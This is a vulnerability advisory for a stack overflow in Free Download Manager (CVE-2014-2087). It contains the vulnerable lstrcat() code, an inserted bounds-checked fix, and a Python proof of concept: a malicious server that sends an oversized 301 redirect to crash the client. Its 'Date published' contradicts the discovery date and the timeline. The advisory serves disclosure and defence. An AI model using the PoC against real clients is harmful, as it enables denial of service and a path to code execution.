1. ADVISORY INFORMATION
-----------------------
Product: Free Download Manager
Vendor URL: www.freedownloadmanager.org
Type: Stack-based Buffer Overflow [CWE-121]
Date found: 2014-02-20
Date published: 2014-02-13
CVSSv2 Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE: CVE-2014-2087
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
--------------------
Free Download Manager v3.9.3 build 1360 (latest)
Free Download Manager v3.8 build 1173
Free Download Manager v3.0 build 852
and other older versions may be affected too.
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in the
Free Download Manager. The application parses download requests, which
are added to the download queue, but does not properly validate the
length of the complete download queue object when it's removed from the
queue by the user. The following function from fdm.exe (source file:
Downloads_Deleted.cpp) is triggered on deletion:

void CDownloads_Deleted::UpdateDownload(int iItem)

This function reads the filename of the download object using
CDownloads_Tasks::GetFileName into szFile and appends the whole URL
value as a description (in brackets) to szFile via an insecure strcat()
sequence during the queue deletion process. Since the application
follows HTTP 301 redirects, an attacker who controls the target HTTP
server is able to send arbitrarily long filename values to exploit this
flaw. If the complete name of the queued download exceeds the size of
szFile (10000 bytes), strcat() writes outside the expected memory
boundaries.

This leads to a stack-based buffer overflow with an overwritten SEH
chain or return pointer, resulting in remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result in a denial-of-service condition.

This vulnerability is also exploitable locally via
"File->Import->Import list of downloads".
5. VULNERABLE CODE PART
-----------------------
// Downloads_Deleted.cpp
void CDownloads_Deleted::UpdateDownload(int iItem)
{
    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
    CHAR szFile [10000];
    CDownloads_Tasks::GetFileName (dld, szFile);
    // no length check: the full URL is appended to the fixed 10000-byte szFile
    lstrcat (szFile, " (");
    lstrcat (szFile, dld->pMgr->get_URL ());
    lstrcat (szFile, ")");
    SetItemText (iItem, 0, szFile);
    [..]
}
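A bounds-checked way to produce the same "<filename> (<url>)" item text, added here as an illustration and not Free Download Manager's own code. The names build_item_text, fits_with_url_length and short_case_matches and the sample filename and URL values are assumptions; the 10000-byte buffer size is the one from the advisory:

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SZFILE_LEN 10000   /* size of szFile in the vulnerable function */

/* Builds "<name> (<url>)" into dst, which holds dst_len bytes.
 * Unlike the lstrcat() chain, the required length is known before
 * anything is written: snprintf() returns the length the full string
 * would need, so a result that does not fit is refused (dst left empty)
 * instead of being written past the end of the buffer. */
bool build_item_text(char *dst, size_t dst_len, const char *name, const char *url)
{
    if (dst == NULL || dst_len == 0 || name == NULL || url == NULL)
        return false;
    int n = snprintf(dst, dst_len, "%s (%s)", name, url);
    if (n < 0 || (size_t)n >= dst_len) {
        dst[0] = '\0';   /* refuse rather than silently truncate the URL */
        return false;
    }
    return true;
}

/* Drives the check with a constructed URL of url_len bytes of 'C'
 * (the same 0x43 filler the advisory's PoC uses) and a constructed
 * filename "setup.exe", against a buffer of the advisory's size. */
bool fits_with_url_length(size_t url_len)
{
    char szFile[SZFILE_LEN];
    char *url = malloc(url_len + 1);
    if (url == NULL)
        return false;
    memset(url, 'C', url_len);
    url[url_len] = '\0';
    bool ok = build_item_text(szFile, sizeof szFile, "setup.exe", url);
    free(url);
    return ok;
}

/* Returns true when a short, well-formed (constructed) input is laid
 * out exactly as the original code intended: "<name> (<url>)". */
bool short_case_matches(void)
{
    char buf[32];
    return build_item_text(buf, sizeof buf, "a.txt", "http://x/a.txt")
        && strcmp(buf, "a.txt (http://x/a.txt)") == 0;
}
```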
6. PROOF-OF-CONCEPT (PYTHON)
----------------------------
#!/usr/bin/python
from socket import *
from time import sleep

host = "192.168.0.1"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

junk0 = "\x43" * 9000
payload = junk0

buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: " + payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a href=\"" + payload + "\">here</a>.</p>\n"
buffer += "</body></html>\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
7. SOLUTION
-----------
None
8. REPORT TIMELINE
------------------
2014-02-20: Discovery of the vulnerability
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
2014-02-24: MITRE assigns CVE-2014-2087
2014-02-25: Vendor Notification #2
2014-02-26: Vendor Notification #3
2014-03-05: Vendor Response
2014-03-05: Vulnerability details sent to vendor
2014-03-09: RCE Security asks for a status update
2014-03-13: No response from vendor
2014-03-13: Full Disclosure according to disclosure policy